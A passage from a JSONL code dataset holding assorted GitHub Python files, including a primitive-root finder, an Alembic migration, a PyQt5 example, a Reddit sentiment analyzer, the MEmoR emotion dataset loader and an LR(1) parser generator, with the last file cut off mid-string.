'add':\n add(namesp, var_par)\n elif 
command == 'create':\n create(namesp, var_par)\n else:\n res = get_var(namesp, var_par)\n results.append(res)\n\nprint(*results, sep='\\n')\n","repo_name":"ClientFromHell/stepik","sub_path":"General_Python/1.0/prostranstvi_imen.py","file_name":"prostranstvi_imen.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25879455082","text":"from math import sqrt\n \ndef isPrime(n): \n if (n <= 1): \n return False\n if (n <= 3): \n return True\n if (n % 2 == 0 or n % 3 == 0): \n return False\n i = 5\n while(i * i <= n): \n if (n % i == 0 or n % (i + 2) == 0): \n return False\n i = i + 6\n return True\n\ndef power(x, y, p): \n res = 1 \n x = x % p \n while (y > 0): \n if (y & 1): \n res = (res * x) % p \n y = y >> 1 \n x = (x * x) % p \n return res \n\ndef findPrimefactors(s, n): \n while (n % 2 == 0): \n s.add(2) \n n = n // 2\n for i in range(3, int(sqrt(n)), 2): \n while (n % i == 0): \n s.add(i) \n n = n // i \n if (n > 2): \n s.add(n) \n\ndef findPrimitive(n): \n s = set() \n if (isPrime(n) == False): \n return -1 \n phi = n - 1\n findPrimefactors(s, phi) \n for r in range(2, phi + 1): \n\n flag = False\n for it in s: \n\n if (power(r, phi // it, n) == 1): \n\n flag = True\n break\n\t\t\t \n if (flag == False): \n return r \n\n return -1\n\nn = 761\nprint(\"Smallest primitive root of\", \n n, \"is\", findPrimitive(n)) \n\n\n","repo_name":"roca12/gpccodes","sub_path":"Recien traducido/Matematica/PrimitiveRoot.py","file_name":"PrimitiveRoot.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"29266116496","text":"\"\"\"Create a new field for documents in product model\n\nRevision ID: 531997d75f68\nRevises: 0172a3e2f2a0\nCreate Date: 2023-06-26 08:13:17.218787\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '531997d75f68'\ndown_revision = '0172a3e2f2a0'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('products', sa.Column('document_url', sa.String(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('products', 'document_url')\n # ### end Alembic commands ###\n","repo_name":"dmitryzhurkovsky/cabel_torg","sub_path":"backend/migrations/versions/531997d75f68_create_a_new_field_for_documents_in_.py","file_name":"531997d75f68_create_a_new_field_for_documents_in_.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"35268563665","text":"# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nZetCode PyQt5 tutorial \r\n\r\nThis program creates a quit\r\nbutton. When we press the button,\r\nthe application terminates. 
\r\n\r\nAuthor: Jan Bodnar\r\nWebsite: zetcode.com \r\nLast edited: August 2017\r\n\"\"\"\r\n\r\nimport sys\r\nfrom PyQt5.QtWidgets import QWidget, QPushButton, QApplication\r\nfrom PyQt5.QtCore import QCoreApplication\r\n\r\n\r\nclass Example(QWidget):\r\n \r\n def __init__(self):\r\n super().__init__()\r\n \r\n self.initUI()\r\n \r\n \r\n def initUI(self): \r\n \r\n qbtn = QPushButton('Quit', self)\r\n qbtn.clicked.connect(QCoreApplication.instance().quit) # event delivery: the click signal triggers the application's quit slot\r\n qbtn.resize(qbtn.sizeHint())\r\n qbtn.move(50, 50) \r\n \r\n self.setGeometry(300, 300, 250, 150)\r\n self.setWindowTitle('Quit button') \r\n self.show()\r\n \r\n \r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n ex = Example()\r\n sys.exit(app.exec_())","repo_name":"Yeah-Kun/python","sub_path":"GUI/qt/ZetCode/Closing_a_window.py","file_name":"Closing_a_window.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"3"} +{"seq_id":"35610867","text":"import sys\nimport io\nimport datetime\nimport math\nimport os.path\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer as SIA\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom driver import *\n\ncomment_df = pd.DataFrame([], columns = comment_df_columns)\n\ndef update_sentiment(path):\n global comment_df\n fullpath = 'game_comment_dfs/'+path+'.csv'\n # Read given file\n if os.path.isfile(fullpath):\n comment_df = pd.read_csv(fullpath)[comment_df_columns]\n print(\"Read \" + fullpath)\n else:\n print(path + \" was not found\")\n return\n # Update polarities for each comment\n polarities = []\n sia = SIA()\n for comment in comment_df['body']:\n pol_score = sia.polarity_scores(comment)\n polarities.append(pol_score['compound'])\n assert len(polarities) == len(comment_df)\n # assign new column and save it to CSV\n comment_df['polarity'] = polarities\n print(comment_df.head())\n comment_df.to_csv(fullpath)\n print('Successfully updated polarities for ' + path + ' to CSV')\n\ndef avg_over_time(path):\n post_df = pd.read_csv(\"post_df.csv\")[post_df_columns]\n fullpath = 'game_comment_dfs/'+path+'.csv'\n comment_df = pd.read_csv(fullpath)[['body', 'author_flair_text', 'score', 'created_utc', 'link_id', 'polarity']]\n game_vars = path.split('_')\n team_1 = game_vars[2]\n team_2 = game_vars[3]\n # set time limit to 5 hours after game start\n start_time = post_df[post_df['link_id']==game_vars[1]]['created_utc'].values[0]\n print(start_time)\n time_limit = start_time + 18000\n # initialize graph_data\n graph_data = pd.DataFrame(0.0, index=range(30), columns=[team_1 +' sum', team_2+' sum', 'Everyone else sum', team_1+' cnt', team_2+' cnt', 'Everyone else cnt'])\n # print(graph_data.shape)\n for idx in comment_df.index:\n # print(comment_df['created_utc'][idx])\n # print(comment_df.loc[idx, 'created_utc'])\n # print(time_limit)\n if comment_df.loc[idx, 'created_utc'] >= time_limit:\n continue\n com_pol = comment_df['polarity'][idx]\n print(com_pol)\n com_tm = comment_df['author_flair_text'][idx]\n com_idx = int((comment_df['created_utc'][idx] - start_time) / 600)\n # print(com_idx)\n # Data for 2 teams in the game\n if (com_tm == team_1) or (com_tm == team_2):\n graph_data.loc[com_idx][com_tm+' sum'] += float(com_pol)\n graph_data.loc[com_idx][com_tm+' cnt'] += 1\n # Everyone else data\n else:\n graph_data.loc[com_idx]['Everyone else sum'] += float(com_pol)\n graph_data.loc[com_idx]['Everyone else cnt'] += 1\n utcs = [start_time + (i * 600) for i in 
range(30)]\n graph_data['utcs'] = utcs\n print(graph_data.head())\n graph_data.to_csv('graph_data.csv')\n\n\n\n\n # print(\"before and after\")\n print(len(comment_df))\n # post_df = post_df[post_df['created_utc']. < time_limit]\n # print(len(comment_df[comment_df['created_utc'] < pd.Series([time_limit] * len(comment_df))]))\n # print(start_time)\n\n\n\ntest_path = 'week11_dxpi00_Broncos_Vikings'\n# update_sentiment(test_path)\navg_over_time(test_path)\n","repo_name":"colinlai7/nfl-sentiment-bot","sub_path":"analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":3187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"10654805594","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\napp_secret = os.getenv(\"SERVER_APP_SECRET\")\n\ndb = SQLAlchemy()\nDB_NAME = \"database.db\"\n\ndef create_app():\n app = Flask(__name__)\n app.config[\"SECRET_KEY\"] = app_secret\n app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = f\"sqlite:///{DB_NAME}\"\n db.init_app(app)\n\n if not os.path.exists(DB_NAME):\n db.create_all(app=app)\n\n return app\n","repo_name":"kaosi-anikwe/spleeter","sub_path":"api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16771895019","text":"import torch.utils.data as data\nfrom torch.nn.utils.rnn import pad_sequence\nimport torch\nfrom base import BaseDataLoader\nfrom utils import read_json\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom features import AudioFeatureExtractor, TextFeatureExtractor, VisualFeatureExtractor, PersonalityFeatureExtractor\n\nEMOTIONS = [\"neutral\",\"joy\",\"anger\",\"disgust\",\"sadness\",\"surprise\",\"fear\",\"anticipation\",\"trust\",\"serenity\",\"interest\",\"annoyance\",\"boredom\",\"distraction\"]\n\nclass MEmoRDataset(data.Dataset):\n \n def __init__(self, config):\n super().__init__()\n self.config = config\n annos = read_json(config['anno_file'])[config['emo_type']]\n # ids = []\n # tmp_annos = []\n # with open(config['id_file']) as fin:\n # for line in fin.readlines():\n # ids.append(int(line.strip()))\n \n # for jj, anno in enumerate(annos):\n # if jj in ids:\n # tmp_annos.append(anno)\n # annos = tmp_annos\n \n emo_num = 9 if config['emo_type'] == 'primary' else 14\n self.emotion_classes = EMOTIONS[:emo_num]\n \n data = read_json(config['data_file'])\n self.visual_features, self.audio_features, self.text_features = [], [], []\n self.visual_valids, self.audio_valids, self.text_valids = [], [], []\n self.labels = []\n self.charcaters_seq = []\n self.time_seq = []\n self.target_loc = []\n self.seg_len = [] \n self.n_character = []\n vfe = VisualFeatureExtractor(config)\n afe = AudioFeatureExtractor(config)\n tfe = TextFeatureExtractor(config)\n pfe = PersonalityFeatureExtractor(config)\n self.personality_list = pfe.get_features()\n self.personality_features = []\n \n\n for jj, anno in enumerate(tqdm(annos)):\n clip = anno['clip']\n target_character = anno['character']\n target_moment = anno['moment']\n on_characters = data[clip]['on_character']\n if target_character not in on_characters:\n on_characters.append(target_character)\n on_characters = sorted(on_characters)\n \n charcaters_seq, time_seq, target_loc, personality_seq = [], [], [], []\n \n for character in 
on_characters:\n for ii in range(len(data[clip]['seg_start'])):\n charcaters_seq.append([0 if character != i else 1 for i in range(len(config['speakers']))])\n time_seq.append(ii)\n personality_seq.append(self.personality_list[character])\n if character == target_character and data[clip]['seg_start'][ii] <= target_moment < data[clip]['seg_end'][ii]:\n target_loc.append(1)\n else:\n target_loc.append(0)\n \n vf, v_valid = vfe.get_feature(anno['clip'], target_character)\n af, a_valid = afe.get_feature(anno['clip'], target_character)\n tf, t_valid = tfe.get_feature(anno['clip'], target_character)\n \n \n self.n_character.append(len(on_characters))\n self.seg_len.append(len(data[clip]['seg_start']))\n \n self.personality_features.append(torch.stack(personality_seq))\n self.charcaters_seq.append(torch.tensor(charcaters_seq))\n self.time_seq.append(torch.tensor(time_seq))\n self.target_loc.append(torch.tensor(target_loc, dtype=torch.int8))\n self.visual_features.append(vf)\n self.audio_features.append(af)\n self.text_features.append(tf)\n self.visual_valids.append(v_valid)\n self.audio_valids.append(a_valid)\n self.text_valids.append(t_valid)\n self.labels.append(self.emotion_classes.index(anno['emotion'])) \n \n\n def __getitem__(self, index):\n \n return torch.tensor([self.labels[index]]), \\\n self.visual_features[index], \\\n self.audio_features[index], \\\n self.text_features[index], \\\n self.personality_features[index], \\\n self.visual_valids[index], \\\n self.audio_valids[index], \\\n self.text_valids[index], \\\n self.target_loc[index], \\\n torch.tensor([1]*len(self.time_seq[index]), dtype=torch.int8), \\\n torch.tensor([self.seg_len[index]], dtype=torch.int8), \\\n torch.tensor([self.n_character[index]], dtype=torch.int8)\n \n\n def __len__(self):\n return len(self.visual_features)\n\n def collate_fn(self, data):\n dat = pd.DataFrame(data)\n return [pad_sequence(dat[i], True) for i in dat]\n\n def statistics(self):\n all_emotion = [0] * len(self.emotion_classes)\n for emotion in self.labels:\n all_emotion[emotion] += 1\n return all_emotion\n\n\nclass MEmoRDataLoader(BaseDataLoader):\n def __init__(self, config, training=True):\n data_loader_config = config['data_loader']['args']\n self.seed = data_loader_config['seed']\n self.dataset = MEmoRDataset(config)\n self.emotion_nums = self.dataset.statistics()\n super().__init__(self.dataset, data_loader_config['batch_size'], data_loader_config['shuffle'], data_loader_config['validation_split'], data_loader_config['num_workers'], collate_fn=self.dataset.collate_fn)\n\n def _split_sampler(self, split):\n if split == 0.0:\n return None, None\n\n idx_full = np.arange(self.n_samples)\n\n np.random.seed(self.seed)\n np.random.shuffle(idx_full)\n\n if isinstance(split, int):\n assert split > 0\n assert split < self.n_samples, \"validation set size is configured to be larger than entire dataset.\"\n len_valid = split\n else:\n len_valid = int(self.n_samples * split)\n\n valid_idx = idx_full[0:len_valid]\n train_idx = np.delete(idx_full, np.arange(0, len_valid))\n weights_per_class = 1. 
/ torch.tensor(self.emotion_nums, dtype=torch.float)\n weights = [0] * self.n_samples\n for idx in range(self.n_samples):\n if idx in valid_idx:\n weights[idx] = 0.\n else:\n label = self.dataset[idx][0]\n weights[idx] = weights_per_class[label]\n weights = torch.tensor(weights)\n train_sampler = data.WeightedRandomSampler(weights=weights, num_samples=len(weights), replacement=True)\n \n valid_sampler = data.SubsetRandomSampler(valid_idx)\n\n # turn off shuffle option which is mutually exclusive with sampler\n self.shuffle = False\n self.n_samples = len(train_idx)\n\n return train_sampler, valid_sampler\n","repo_name":"sunlightsgy/MEmoR","sub_path":"data_loader/data_loaders.py","file_name":"data_loaders.py","file_ext":"py","file_size_in_byte":6797,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"3"} +{"seq_id":"30392486909","text":"from stepper import Stepper\nimport time\n# Move the stepper from start point to end point\nstep = Stepper(\"/dev/ttyACMA0\")\ntime.sleep(0.5)\nstep.moveStep()\ntime.sleep(12.5)\nstep.moveBack()\ntime.sleep(1)\nstep.com.close()","repo_name":"TimothySingowikromo/baby3dscanner","sub_path":"baby3dscanner/test/stepper_test.py","file_name":"stepper_test.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13436163284","text":"\"\"\"\nThis batch should only be run when we want to load symbols for a specific\nexchange into our database\n\npython -m server.batch.setup_exchange_symbols --name=NYSE\n\"\"\"\nimport argparse\nimport os\nfrom sqlalchemy.exc import IntegrityError\n\nfrom server.database import db_session\nfrom server.data_access.stock_exchange import get_stock_exchange\nfrom server.data_access.stock_exchange import register_stock_exchange\nfrom server.data_access.ticker import register_ticker_symbol\n\n# Parse the arguments to get the exchange we want to load information for\nparser = argparse.ArgumentParser(\n description=\"Setup an exchange and its related tickers\"\n)\nparser.add_argument(\"--name\", type=str, help=\"The stock exchange symbol\", required=True)\nargs = parser.parse_args()\n\nexchange_name = args.name\n\n# Create the exchange if it doesn't already exist. 
Fetch it if it already\n# exists\ntry:\n stock_exchange = register_stock_exchange(name=exchange_name)\nexcept IntegrityError:\n db_session.rollback()\n stock_exchange = get_stock_exchange(name=exchange_name)\n\n# Load the symbols and company names into the symbols database\nsymbols_file_path = os.getcwd() + f\"/server/data/exchange/{exchange_name}.txt\"\ntry:\n with open(symbols_file_path, \"r\") as f:\n for line in f.readlines()[1:]:\n try:\n symbol, name = line.strip().split(\"\\t\")\n except ValueError:\n continue\n\n try:\n register_ticker_symbol(stock_exchange.id, symbol, name)\n except IntegrityError:\n db_session.rollback()\n print(f\"ERROR: Integrity error while persisting {symbol}\")\n continue\nexcept FileNotFoundError:\n print(f\"ERROR: Could not find the file with ticker symbols\")\n","repo_name":"gkeswani92/stock-portfolio","sub_path":"server/batch/setup_exchange_symbols.py","file_name":"setup_exchange_symbols.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8616188934","text":"from __future__ import annotations\n\nfrom collections import namedtuple\nfrom pathlib import Path\nfrom typing import Optional, Dict, List, Set, FrozenSet, Any\nfrom typing import Tuple\n\nfrom sleepy.errors import ParseError\nfrom sleepy.syntactical_analysis.grammar import EPSILON, Production, SyntaxTree, IGNORED_TOKEN, \\\n get_token_word_from_tokens_pos, TreePosition, AttributeGrammar, DummyPath, Grammar\n\n\ndef make_first1_sets(grammar: Grammar) -> Dict[str, Set[Optional[str]]]:\n # fi(x) = {x} for all terminals, compute non-terminals iteratively\n first1_sets: Dict[str, Set[Optional[str]]] = {\n symbol: {symbol} if symbol in grammar.terminals else set()\n for symbol in grammar.symbols}\n changes = True\n while changes:\n changes = False\n for symbol in grammar.non_terminals:\n first1 = set()\n for prod in grammar.get_prods_for(symbol):\n first1.update(get_first1_set_for_word(first1_sets, prod.right))\n if first1 != first1_sets[symbol]:\n first1_sets[symbol] = first1\n changes = True\n\n assert all(all(x in grammar.terminals or x is EPSILON for x in first1) for first1 in first1_sets.values())\n return first1_sets\n\n\ndef get_first1_set_for_word(first1_sets: Dict[str, Set[Optional[str]]], word: Tuple[str]) -> Set[Optional[str]]:\n assert EPSILON not in word\n first1 = set()\n for pos, right_symbol in enumerate(word):\n # add all fi(X_{i+1}) to fi(A)\n first1.update(first1_sets.get(right_symbol, set()) - {EPSILON})\n if EPSILON not in first1_sets.get(right_symbol, set()):\n break\n # if A -> X1 ... 
Xn, and EPSILON in fi(X1),...,fi(Xn), then EPSILON in fi(A)\n if all(EPSILON in first1_sets.get(right, set()) for right in word):\n first1.add(EPSILON)\n return first1\n\n\nclass _Item:\n def __init__(self, prod: Production, pointer: int, la: Optional[str]):\n \"\"\"\n :param la: look-ahead, None iff epsilon\n \"\"\"\n assert 0 <= pointer <= len(prod.right)\n self.prod = prod\n self.pointer = pointer\n self.la = la\n\n def __eq__(self, other):\n if not isinstance(other, _Item):\n return False\n return self.prod == other.prod and self.pointer == other.pointer and self.la == other.la\n\n def __repr__(self) -> str:\n return '_Item[%s -> %s, %r]' % (\n self.prod.left, ' '.join(self.prod.right[:self.pointer] + ('.',) + self.prod.right[self.pointer:]), self.la)\n\n def __hash__(self):\n return hash((self.prod, self.pointer, self.la))\n\n\nclass _Action:\n \"\"\"\n Actions used by parser\n \"\"\"\n\n\nclass _AcceptAction(_Action):\n def __repr__(self) -> str:\n return '_AcceptAction'\n\n\nclass _ReduceAction(_Action):\n def __init__(self, prod: Production):\n self.prod = prod\n\n def __repr__(self) -> str:\n return '_ReduceAction[%r]' % self.prod\n\n\nclass _ShiftAction(_Action):\n def __init__(self, symbol: str):\n assert symbol is not EPSILON\n self.symbol = symbol\n\n def __repr__(self) -> str:\n return '_ShiftAction[%r]' % self.symbol\n\n\nclass ParserGenerator:\n \"\"\"\n A general LR(1) grammar parser generator.\n \"\"\"\n\n def __init__(self, grammar: Grammar):\n self.grammar = grammar\n assert self.grammar.is_start_separated()\n start_prods = self.grammar.get_prods_for(self.grammar.start)\n assert len(start_prods) == 1\n self._start_prod = start_prods[0]\n\n self._initial_state = 0\n self._num_states: int = 0\n self._state_action_table: List[Dict[str, _Action]] = []\n self._state_goto_table: List[Dict[str, int]] = []\n self._state_descr: List[str] = []\n self.first1_sets = make_first1_sets(self.grammar)\n\n self._make()\n\n def _make_item_set(self, initial_items):\n \"\"\"\n Makes the smallest state s at least containing `initial_items`,\n computes its action table act(s,x) -> action (where x is a symbol or EPSILON),\n as well as a set of terminals a s.t. goto(s,a) != sink.\n :param list[_LrItem] initial_items:\n :returns: Completed item set, action function, next symbols\n :rtype: tuple[frozenset[_LrItem], dict[str, _LrAction], list[str]]\n \"\"\"\n add_item_queue = initial_items.copy()\n\n state = set()\n actions: Dict[str, _Action] = {}\n next_symbols = set()\n\n while len(add_item_queue) >= 1:\n item = add_item_queue.pop(-1)\n if item in state:\n continue\n state.add(item)\n if item.pointer == len(item.prod.right):\n # Reduce A -> alpha .\n assert item.la not in actions, 'Grammar not LR(1)! Partial item set %r: item %r action conflicts with %r' % (\n state, item, actions)\n if item.prod != self._start_prod:\n actions[item.la] = _ReduceAction(item.prod)\n else:\n actions[item.la] = _AcceptAction()\n continue\n next_symbol = item.prod.right[item.pointer]\n next_symbols.add(next_symbol)\n if next_symbol in self.grammar.non_terminals:\n # If A-> alpha . B beta in state, add all [B -> . gamma, fi(beta x)]\n word_after_next_symbol = item.prod.right[item.pointer + 1:] + (() if item.la is EPSILON else (item.la,))\n add_item_queue.extend([_Item(p, 0, new_la)\n for p in self.grammar.get_prods_for(next_symbol)\n for new_la in get_first1_set_for_word(self.first1_sets, word_after_next_symbol)])\n else:\n assert next_symbol in self.grammar.terminals\n # Shift A -> . 
a beta\n assert (\n next_symbol not in actions or\n (isinstance(actions[next_symbol], _ShiftAction) and actions[next_symbol].symbol == next_symbol)), (\n 'Grammar not LR(1)! Partial item set %r: item %r action conflicts with %r' % (state, item, actions))\n actions[next_symbol] = _ShiftAction(next_symbol)\n return frozenset(state), actions, sorted(next_symbols)\n\n def _make(self):\n \"\"\"\n Construct the automaton.\n \"\"\"\n states: Dict[FrozenSet[_Item], int] = {}\n state_action_table: List[Dict[str, _Action]] = []\n state_goto_table: List[Dict[str, int]] = []\n\n def add_next_state(from_state, symbol):\n \"\"\"\n Recursively adds the states reachable from `from_state` when first processing `symbol`.\n Populates`states`, `state_action_table` and `state_goto_table` for all added states\n as well as `state_goto_table` of `from_state`.\n :param frozenset[_LrItem] from_state: reachable (non-sink) state\n :param str symbol: a non-terminal\n \"\"\"\n assert len(from_state) > 0, 'from_state should be reachable, i.e. not the sink state'\n assert symbol is not EPSILON\n to_state, to_state_actions, next_symbols = self._make_item_set([\n _Item(item.prod, item.pointer + 1, item.la)\n for item in from_state if item.pointer < len(item.prod.right) and item.prod.right[item.pointer] == symbol])\n from_state_idx = states[from_state]\n to_state_idx = states.get(to_state, len(states))\n if symbol in state_goto_table[from_state_idx]:\n assert state_goto_table[from_state_idx][symbol] == to_state_idx\n else:\n state_goto_table[from_state_idx][symbol] = to_state_idx\n if to_state in states:\n return\n assert len(state_action_table) < to_state_idx + 1 and len(state_goto_table) < to_state_idx + 1\n states[to_state] = to_state_idx\n state_action_table.append(to_state_actions)\n state_goto_table.append({})\n for next_symbol in next_symbols:\n add_next_state(to_state, next_symbol)\n\n initial_state, initial_actions, initial_next_symbols = self._make_item_set([_Item(self._start_prod, 0, EPSILON)])\n states[initial_state] = 0\n state_action_table.append(initial_actions)\n state_goto_table.append({})\n for initial_symbol in initial_next_symbols:\n add_next_state(initial_state, initial_symbol)\n\n self._num_states = len(states)\n self._state_action_table = state_action_table\n self._state_goto_table = state_goto_table\n self._state_descr = ['{%s}' % ', '.join([repr(item) for item in state]) for state in states.keys()]\n\n def parse_analysis(self, word, tokens, tokens_pos):\n \"\"\"\n :param str word:\n :param list[str] tokens:\n :param list[int] tokens_pos: start index of word for each token\n :rtype: tuple[Production]:\n :raises: ParseError\n :returns: a right-most analysis of `tokens` or raises ParseError\n \"\"\"\n attr_grammar = AttributeGrammar(\n self.grammar, [{}] * len(self.grammar.prods), terminal_attr_rules={term: {} for term in self.grammar.terminals})\n analysis, _ = self.parse_syn_attr_analysis(attr_grammar, word=word, tokens=tokens, tokens_pos=tokens_pos)\n return analysis\n\n def parse_syn_attr_analysis(self,\n attr_grammar: AttributeGrammar,\n word: str,\n tokens: List[str],\n tokens_pos: List[int],\n file_path: Path | DummyPath = DummyPath('default')) -> (Tuple[Production], Dict[str, Any]): # noqa\n \"\"\"\n Integrates evaluating synthetic attributes into LR-parsing.\n Does not work with inherited attributes, i.e. 
requires the grammar to be s-attributed.\n\n :param AttributeGrammar attr_grammar:\n :param str word:\n :param list[str] tokens:\n :param list[int] tokens_pos: start index of word for each token\n :param Path | DummyPath file_path:\n :rtype: (tuple[Production], dict[str,Any])\n :raises: ParseError\n :returns: a right-most analysis of `tokens` + evaluation of attributes in start symbol\n \"\"\"\n assert attr_grammar.is_s_attributed(), 'only s-attributed grammars supported'\n assert len(tokens) == len(tokens_pos)\n\n accepted = False\n pos = 0\n state_stack = [self._initial_state]\n attr_eval_stack: List[Dict[str, Any]] = []\n start_pos_stack: List[int] = []\n rev_analysis: List[Production] = []\n\n while not accepted:\n while pos < len(tokens) and tokens[pos] is IGNORED_TOKEN:\n pos += 1\n la = EPSILON if pos == len(tokens) else tokens[pos]\n state = state_stack[-1]\n action = self._state_action_table[state].get(la)\n if isinstance(action, _ShiftAction) and action.symbol == la:\n shifted_token = tokens[pos]\n shifted_token_word = get_token_word_from_tokens_pos(word, tokens_pos, pos)\n pos += 1\n state_stack.append(self._state_goto_table[state][action.symbol])\n attr_eval_stack.append(attr_grammar.get_terminal_syn_attr_eval(shifted_token, shifted_token_word))\n start_pos_stack.append(pos - 1)\n elif isinstance(action, _ReduceAction):\n right_attr_evals: List[Dict[str, Any]] = attr_eval_stack[len(attr_eval_stack) - len(action.prod.right):]\n if len(action.prod.right) > 0:\n prod_start_pos = start_pos_stack[len(attr_eval_stack) - len(action.prod.right)]\n else:\n prod_start_pos = pos\n for i in range(len(action.prod.right)):\n state_stack.pop()\n attr_eval_stack.pop()\n start_pos_stack.pop()\n assert len(right_attr_evals) == len(action.prod.right)\n state_stack.append(self._state_goto_table[state_stack[-1]][action.prod.left])\n tree_pos = TreePosition.from_token_pos(\n file_path, word=word, tokens_pos=tokens_pos, from_token_pos=prod_start_pos, to_token_pos=pos)\n attr_eval_stack.append(attr_grammar.eval_prod_syn_attr(\n action.prod, {}, right_attr_evals, helper_values={'_pos': tree_pos}))\n start_pos_stack.append(prod_start_pos)\n rev_analysis.append(action.prod)\n elif isinstance(action, _AcceptAction) and len(state_stack) == 2:\n assert state_stack[0] == self._initial_state\n assert len(attr_eval_stack) == len(start_pos_stack) == len(self._start_prod.right) == 1\n right_attr_evals: List[Dict[str, Any]] = attr_eval_stack[-len(self._start_prod.right):]\n prod_start_pos = start_pos_stack[-len(self._start_prod.right)]\n assert len(right_attr_evals) == len(self._start_prod.right)\n state_stack.clear()\n attr_eval_stack.clear()\n start_pos_stack.clear()\n tree_pos = TreePosition.from_token_pos(\n file_path, word=word, tokens_pos=tokens_pos, from_token_pos=prod_start_pos, to_token_pos=pos)\n attr_eval_stack.append(attr_grammar.eval_prod_syn_attr(\n self._start_prod, {}, right_attr_evals, helper_values={'_pos': tree_pos}))\n rev_analysis.append(self._start_prod)\n start_pos_stack.append(prod_start_pos)\n accepted = True\n else: # error\n if la == \"new_line\":\n pos += 1\n continue\n la_name = '%r token' % la if la is not EPSILON else 'end of file'\n possible_next_tokens = set(self._state_action_table[state].keys())\n raise ParseError(\n program_path=file_path, word=word, pos=tokens_pos[pos] if pos < len(tokens_pos) else len(word),\n message='Unexpected %s, expected: %s' % (la_name, ', '.join(['%r' % t for t in possible_next_tokens])))\n\n assert rev_analysis[-1] == self._start_prod\n assert 
len(attr_eval_stack) == len(start_pos_stack) == 1\n return tuple(reversed(rev_analysis)), attr_eval_stack[0]\n\n def parse_tree(self, word, tokens, tokens_pos):\n \"\"\"\n :param str word:\n :param list[str] tokens:\n :param list[int] tokens_pos: start index of word for each token\n :rtype: SyntaxTree\n \"\"\"\n\n def make_prod_tree(prod, tree):\n \"\"\"\n :param Production prod:\n :param Callable[[int], SyntaxTree] tree:\n :type: SyntaxTree\n \"\"\"\n return SyntaxTree(prod, *[tree(pos) for pos in range(1, len(prod.right) + 1)])\n\n from functools import partial\n attr_g = AttributeGrammar(\n self.grammar,\n syn_attrs={'tree'},\n prod_attr_rules={\n prod: {'tree.0': partial(make_prod_tree, prod) if len(prod.right) >= 1 else SyntaxTree(prod)}\n for prod in self.grammar.prods},\n terminal_attr_rules={terminal: {'tree.0': None} for terminal in self.grammar.terminals}\n )\n _, root_attr_eval = self.parse_syn_attr_analysis(attr_g, word, tokens, tokens_pos)\n assert 'tree' in root_attr_eval\n root_tree = root_attr_eval['tree']\n assert isinstance(root_tree, SyntaxTree)\n assert root_tree.prod == self._start_prod\n return root_tree\n\n def parse_stream(self, token_stream):\n SE = namedtuple(\"StackElement\", (\"state\", \"marker\"))\n stack = [SE(self._initial_state, token_stream.mark())]\n\n def token():\n return None if token_stream.current() == \"null\" else token_stream.current()\n\n while True:\n state = stack[-1].state\n action = self._state_action_table[state].get(token())\n\n if isinstance(action, _ShiftAction) and action.symbol == token():\n\n current_token = token()\n token_stream.advance()\n post_token_marker = token_stream.mark() # marker after current_token\n stack.append(SE(self._state_goto_table[state][current_token], post_token_marker))\n\n elif isinstance(action, _ReduceAction):\n\n for _ in range(len(action.prod.right)):\n stack[-1].marker.drop()\n stack.pop()\n\n begin_state, begin_marker = stack[-1] # marker and state before the subtree we are reducing\n stack[-1] = SE(stack[-1].state, begin_marker.precede()) # replace marker so we can use begin_marker\n\n begin_marker.done(action.prod.left) # finish subtree\n\n stack.append(SE(self._state_goto_table[begin_state][action.prod.left], token_stream.mark()))\n\n elif isinstance(action, _AcceptAction) and len(stack) == 2:\n stack[1].marker.drop()\n stack[0].marker.done(\"FILE\")\n return\n else:\n # error case\n if token() == \"new_line\":\n token_stream.makeCurrentWhitespace()\n token_stream.advance()\n continue\n\n for state, marker in stack[1:-1]:\n marker.drop()\n\n token_name = '%r token' % token() if token() is not None else 'end of file'\n possible_next_tokens = map(lambda t: \"EOF\" if t is None else t, self._state_action_table[stack[-1].state].keys())\n message = 'Unexpected %s, expected: %s' % (token_name, ', '.join(['%r' % t for t in possible_next_tokens]))\n\n token_stream.advance()\n stack[-1].marker.error(message)\n\n while token() is not None: token_stream.advance()\n\n stack[0].marker.done(\"FILE\")\n return","repo_name":"Zettelkasten/sleepy","sub_path":"sleepy/syntactical_analysis/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":16225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"30033979691","text":"def ler_produtos():\n produtos = []\n while True:\n print(\"Digite os dados do produto e pressione Enter. 
